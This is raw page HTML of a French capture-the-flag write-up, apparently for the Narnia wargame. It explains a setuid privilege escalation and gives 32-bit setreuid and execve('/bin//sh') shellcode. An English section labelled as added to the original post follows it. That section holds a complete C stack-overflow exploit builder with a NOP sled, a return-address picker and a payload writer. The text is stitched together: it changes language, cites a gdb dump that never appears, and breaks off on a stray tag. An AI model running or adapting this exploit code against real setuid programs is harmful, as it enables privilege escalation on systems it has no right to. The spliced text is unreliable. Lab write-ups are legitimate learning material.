class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b4931d3 elementor-widget elementor-widget-heading\" data-id=\"b4931d3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h4 class=\"elementor-heading-title elementor-size-default\"><span data-token-index=\"0\" class=\"notion-enable-hover\">Privilege escalation<\/span><\/h4>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f481668 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f481668\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7676b3b\" data-id=\"7676b3b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-93ffff5 elementor-widget elementor-widget-text-editor\" data-id=\"93ffff5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>To escalate privileges, we use the sticky bit.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-da18485 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"da18485\" data-element_type=\"section\" 
data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a2b4c5d\" data-id=\"a2b4c5d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d616b2c elementor-widget elementor-widget-text-editor\" data-id=\"d616b2c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Le <code>sticky bit<\/code> est pr\u00e9sent sur les fichiers qui s\u2019ex\u00e9cutent avec un autre utilisateur que l\u2019utilisateur courant.<\/p>\n<p>C\u2019est notamment utile pour les processus qui ont besoin temporairement des droits root.<\/p>\n<p>Cependant, il s\u2019agit d\u2019une pratique dangereuse car elle permet \u00e0 un attaquant d\u2019exploiter une faille du programme et d\u2019ainsi obtenir des acc\u00e8s privil\u00e9gi\u00e9s.<\/p>\n<p>C\u2019est ce nous allons tenter de faire dans ce challenge <img decoding=\"async\" class=\"emoji\" role=\"img\" src=\"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/1f608.svg\" alt=\"\ud83d\ude08\" \/><\/p>\n<p>Pour s\u2019\u00e9lever en privil\u00e8ges gr\u00e2ce au sticky bit, on utilise la commande <code>setreuid()<\/code>.<\/p>\n<p><code>setreuid()<\/code> d\u00e9finit les identifiants r\u00e9els et effectifs du processus appelant.<\/p>\n<p>\u00a0<\/p>\n<blockquote>\n<p><em><strong>L\u2019ID r\u00e9el<\/strong> est la personne que l\u2019on est r\u00e9ellement et <strong>l\u2019ID effectif<\/strong> est celui qui permet au syst\u00e8me de nous autoriser ou non \u00e0 effectuer certaines actions.<\/em><\/p>\n<p><em>\u00a0<\/em><\/p>\n<\/blockquote>\n<p>On \u00e9crit donc un script ASM 32 bits faisant un appel (syscall) \u00e0 la 
fonction setreuid.<\/p>\n<p>\u00a0<\/p>\n<p>Pour <strong>trouver le num\u00e9ro d\u2019appel<\/strong>, il faut fouiller dans le fichier <code>\/usr\/include\/asm\/unistd_32.h<\/code> de la machine Narnia :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-594d72c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"594d72c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f63296f\" data-id=\"f63296f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-049073e elementor-widget elementor-widget-image\" data-id=\"049073e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"329\" height=\"157\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-1.png\" class=\"attachment-large size-large wp-image-560\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-1.png 329w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-1-300x143.png 300w\" sizes=\"(max-width: 329px) 100vw, 329px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-07e697a elementor-section-boxed elementor-section-height-default 
elementor-section-height-default\" data-id=\"07e697a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a7daf21\" data-id=\"a7daf21\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fe646dc elementor-widget elementor-widget-text-editor\" data-id=\"fe646dc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Il s\u2019agit du num\u00e9ro d\u2019appel 70.<\/p>\n<p>Ensuite, il faut trouver quels arguments on doit configurer pour appeler la fonction.<\/p>\n<p>Ici nous avons 2 possibilit\u00e9s : celle d\u2019utiliser <code>getuid<\/code> ou celle de rentrer directement l\u2019ID dans le programme.<\/p>\n<p>La solution la plus simple est de rentrer directement l\u2019ID dans le programme.<\/p>\n<p>Sur ce site : <a href=\"https:\/\/faculty.nps.edu\/cseagle\/assembly\/sys_call.html\">https:\/\/faculty.nps.edu\/cseagle\/assembly\/sys_call.html<\/a>, vous trouverez tous les syscall, ainsi que leur arguments.<\/p>\n<p>\u00a0<\/p>\n<p>Ainsi, pour un programme assembleur 32 bits qui appelle la fonction <code>setreuid<\/code> pour l\u2019utilisateur <strong>narnia3<\/strong>, voici ce que \u00e7a donne :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bb976d8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bb976d8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div 
class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b411abe\" data-id=\"b411abe\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5536ca0 elementor-widget elementor-widget-code-highlight\" data-id=\"5536ca0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>section .text\r\nglobal _start\r\n\t\r\n_start:\r\n\t; xor\r\n\txor eax, eax\r\n\txor ebx, ebx\r\n\t\r\n\t; setreuid(rid, eid);\r\n\txor eax, eax\r\n\t;rid\r\n\tmov bx, 14003   ; bx est le registre 16 bits de ebx\r\n\t;eid\r\n\tmov cx, 14003   ; cx est le registre 16 bits de ecx\r\n\tmov al, 70      ; al est le registre 8 bits de eax\r\n\tint 0x80        ; syscall<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-47cd71f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"47cd71f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8b87432\" data-id=\"8b87432\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap 
elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3f1205f elementor-widget elementor-widget-text-editor\" data-id=\"3f1205f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<blockquote>\n<p><em>14003 est l\u2019id de narnia3, on le configure 2 fois : pour l\u2019id <b>effectif et r\u00e9el<\/b>.<\/em><\/p>\n<\/blockquote>\n<p>Le fait d\u2019utiliser les registres <code>bx<\/code> et <code>cx<\/code> permet d\u2019\u00e9viter d\u2019avoir des z\u00e9ros dans le shellcode.<\/p>\n<p>\u00a0<\/p>\n<p>Pour rappel, voici les diff\u00e9rents registres, ainsi que leur taille :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-fb0978f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"fb0978f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8a93be9\" data-id=\"8a93be9\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3ffa0db elementor-widget elementor-widget-image\" data-id=\"3ffa0db\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"591\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/registers-size.png\" class=\"attachment-large size-large wp-image-561\" alt=\"\" 
srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/registers-size.png 720w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/registers-size-300x246.png 300w\" sizes=\"(max-width: 720px) 100vw, 720px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d58f9bb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d58f9bb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-879fe09\" data-id=\"879fe09\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-eb4387a elementor-widget elementor-widget-text-editor\" data-id=\"eb4387a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<blockquote>\n<p><em>Il est important de tenir compte de la taille de la donn\u00e9e \u00e0 stocker afin de choisir le registre le plus adapt\u00e9. 
Cela permet notamment d\u2019\u00e9viter d\u2019avoir des 0 au milieu du shellcode, emp\u00eachant son fonctionnement.<\/em><\/p>\n<\/blockquote>\n<p>Il faut ensuite r\u00e9p\u00e9ter l\u2019op\u00e9ration pour la fonction <code>execve<\/code> et la fonction <code>exit<\/code>.<\/p>\n<p>Vous pouvez vous inspirer de cet exemple afin de r\u00e9diger cette seconde partie :<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/43716\">https:\/\/www.exploit-db.com\/exploits\/43716<\/a><\/p>\n<h4><strong>Formatage<\/strong><\/h4>\n<p>&nbsp;<\/p>\n<p>Une fois votre code termin\u00e9, ex\u00e9cuter la commande <code>nasm<\/code> afin de le compiler :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-75febe6 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"75febe6\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-de15188\" data-id=\"de15188\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-bd72102 elementor-widget elementor-widget-code-highlight\" data-id=\"bd72102\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>nasm -f elf32 
shellcode.s<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d86b228 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d86b228\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3ce039a\" data-id=\"3ce039a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ac1f458 elementor-widget elementor-widget-text-editor\" data-id=\"ac1f458\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Puis, regarder la sortie de la commande :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c5372e8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c5372e8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7c4cb22\" data-id=\"7c4cb22\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8e3fc83 elementor-widget 
elementor-widget-code-highlight\" data-id=\"8e3fc83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>objdump -d shellcode.o <\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9f0596d elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9f0596d\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d178a31\" data-id=\"d178a31\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-957ae5d elementor-widget elementor-widget-text-editor\" data-id=\"957ae5d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>R\u00e9cup\u00e9rez la deuxi\u00e8me colonne, qui contient le code en hexad\u00e9cimal et formatez le afin d\u2019obtenir un shellcode de ce format l\u00e0 :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bb0646a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" 
data-id=\"bb0646a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2254c21\" data-id=\"2254c21\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f112c8a elementor-widget elementor-widget-code-highlight\" data-id=\"f112c8a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp> \"\\xb0\\x0b\\x99\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\x89\\xe1\\xcd\\x80\"<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8a1ae1f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"8a1ae1f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7576b13\" data-id=\"7576b13\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5170244 elementor-widget elementor-widget-heading\" data-id=\"5170244\" data-element_type=\"widget\" 
data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h3 class=\"elementor-heading-title elementor-size-default\">Debug<\/h3>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b13bd23 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b13bd23\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-65ba8f0\" data-id=\"65ba8f0\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8b53bd0 elementor-widget elementor-widget-text-editor\" data-id=\"8b53bd0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Before testing whether your shellcode works, you need to find the return address.<\/p>\n<p>That address goes at the very end of the injection. The input overflows <code>buf<\/code> and runs on into the saved EBP and then the saved return address; when <code>main<\/code> returns, the value we put there is popped into EIP. 
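<\/p>\n<p>The layout just described, as an added example that is not part of the original post: a small C helper that concatenates the two stubs built above (the <code>setreuid<\/code> listing, with <code>xor ecx, ecx<\/code> added, and the page's <code>execve<\/code> bytes with a leading <code>xor eax, eax<\/code>, both hand-assembled here), refuses any payload containing a NUL byte, picks a return address out of an <code>x\/100x $esp<\/code> dump (the first lines of the dump shown further down are embedded as constructed input), and writes <code>NOP sled | shellcode | return address<\/code> to stdout. The distance from <code>buf<\/code> to the saved EIP (<code>eip_off<\/code>, 140 here) and the program name <code>mkpayload<\/code> are assumptions for the example; the offset has to be measured in gdb.<\/p>

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Null-free setreuid(14003, 14003), hand-assembled from the NASM listing above
 * (xor ecx,ecx added so the upper half of ecx is clean as well). */
static const unsigned char SC_SETREUID[] =
    "\x31\xc0" "\x31\xdb" "\x31\xc9"      /* xor eax,eax ; xor ebx,ebx ; xor ecx,ecx */
    "\x66\xbb\xb3\x36" "\x66\xb9\xb3\x36" /* mov bx,14003 ; mov cx,14003  (0x36b3)  */
    "\xb0\x46" "\xcd\x80";                /* mov al,70 (__NR_setreuid) ; int 0x80   */

/* execve("/bin//sh", {"/bin//sh", NULL}, NULL): the page's 22-byte execve stub
 * with xor eax,eax in front, since eax still holds setreuid's return value. */
static const unsigned char SC_EXECVE[] =
    "\x31\xc0" "\xb0\x0b" "\x99" "\x52"           /* xor eax,eax ; mov al,11 ; cdq ; push edx */
    "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" /* push "//sh" ; push "/bin"                */
    "\x89\xe3" "\x52" "\x53" "\x89\xe1"           /* ebx=esp ; push edx ; push ebx ; ecx=esp  */
    "\xcd\x80";                                   /* int 0x80                                 */

int has_nul(const unsigned char *b, size_t n) {   /* strcpy() stops at the first 0x00 */
    while (n--) if (*b++ == 0) return 1;
    return 0;
}

/* Concatenate both stubs into out; returns the length, or 0 if cap is too small. */
size_t build_shellcode(unsigned char *out, size_t cap) {
    size_t a = sizeof SC_SETREUID - 1, b = sizeof SC_EXECVE - 1;   /* drop string NULs */
    if (cap < a + b) return 0;
    memcpy(out, SC_SETREUID, a);
    memcpy(out + a, SC_EXECVE, b);
    return a + b;
}

/* Scan an "x/Nx $esp" dump for the longest run of 0x90909090 words and return the
 * address of its middle word: a landing spot that tolerates the stack shifting a
 * little between gdb and a real run. *run_len gets the run length in words. */
uint32_t pick_ret_addr(const char *dump, size_t *run_len) {
    uint32_t best_start = 0, run_start = 0;
    size_t best = 0, run = 0;
    for (const char *p = dump; *p; ) {
        const char *eol = strchr(p, '\n'), *colon;
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        if (strncmp(p, "0x", 2) == 0 && (colon = memchr(p, ':', len)) != NULL) {
            uint32_t base = (uint32_t)strtoul(p, NULL, 16);       /* "0xffffd410:" */
            char *end; const char *q = colon + 1;
            for (int col = 0; q < p + len; col++, q = end) {
                unsigned long v = strtoul(q, &end, 16);
                if (end == q || end > p + len) break;           /* end of this line */
                if (v == 0x90909090UL) { if (run++ == 0) run_start = base + 4u * (uint32_t)col; continue; }
                if (run > best) { best = run; best_start = run_start; }
                run = 0;
            }
        }
        p = eol ? eol + 1 : p + len;
    }
    if (run > best) { best = run; best_start = run_start; }
    *run_len = best;
    return best ? best_start + 4u * (uint32_t)(best / 2) : 0;
}

/* Lay out  NOP sled | shellcode | return address  so the address lands on the
 * saved EIP, eip_off bytes past the start of buf. Returns eip_off + 4, or 0 if
 * the shellcode does not fit in front of the saved EIP. */
size_t build_payload(unsigned char *out, size_t cap, size_t eip_off,
                     uint32_t ret_addr, const unsigned char *sc, size_t sc_len) {
    if (sc_len > eip_off || eip_off + 4 > cap) return 0;
    size_t sled = eip_off - sc_len;
    memset(out, 0x90, sled);
    memcpy(out + sled, sc, sc_len);
    for (int i = 0; i < 4; i++)                     /* little-endian, as the CPU reads it */
        out[eip_off + i] = (unsigned char)(ret_addr >> (8 * i));
    return eip_off + 4;
}

/* Constructed input: the first lines of the x/100x $esp dump shown further down. */
static const char DUMP[] =
    "gdb-peda$ x/100x $esp\n"
    "0xffffd400:     0x0804a01c      0xffffd408      0x90909090      0x90909090\n"
    "0xffffd410:     0x90909090      0x90909090      0x90909090      0x90909090\n"
    "0xffffd420:     0x90909090      0x90909090      0x90909090      0x90909090\n"
    "0xffffd430:     0x90909090      0x90909090      0x90909090      0x90909090\n"
    "0xffffd440:     0x90909090      0x90909090      0x90909090      0x90909090\n"
    "0xffffd450:     0x90909090      0x90909090      0x90909090      0x90909090\n"
    "0xffffd460:     0x90909090      0x90909090      0x90909090      0x90909090\n"
    "0xffffd470:     0x90909090      0x90909090      0x90909090      0x90909090\n"
    "0xffffd480:     0x90909090      0x90909090      0x90909090      0x90909090\n"
    "0xffffd490:     0x90909090      0x90909090      0x90909090      0xff009090\n";

int main(void) {
    unsigned char sc[64], payload[256];
    size_t words, sc_len = build_shellcode(sc, sizeof sc);
    uint32_t ret = pick_ret_addr(DUMP, &words);        /* 0xffffd450 for this dump */
    /* eip_off = 140 is an assumption for the example: buf is 128 bytes, but the
     * padding before the saved EBP/EIP has to be measured in gdb, not guessed. */
    size_t n = build_payload(payload, sizeof payload, 140, ret, sc, sc_len);
    if (n == 0 || has_nul(payload, n)) return 1;       /* strcpy would truncate it */
    fwrite(payload, 1, n, stdout);                     /* /narnia/narnia2 "$(./mkpayload)" */
    return 0;
}
```

<p><code>pick_ret_addr<\/code> returns the middle of the longest run of <code>0x90909090<\/code> words: for the dump below that is 37 words from <code>0xffffd408<\/code> to <code>0xffffd498<\/code>, so it picks <code>0xffffd450<\/code>. Aiming at the middle of the sled is what lets the exploit survive the few bytes of stack shift between a run under gdb and a run from the shell (the environment and <code>argv[0]<\/code> differ). The helper only emits bytes, so it compiles with plain <code>gcc<\/code>; because the payload is checked to be NUL-free it can be passed as an argument, e.g. <code>\/narnia\/narnia2 \"$(.\/mkpayload)\"<\/code>.<\/p>\n<p>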
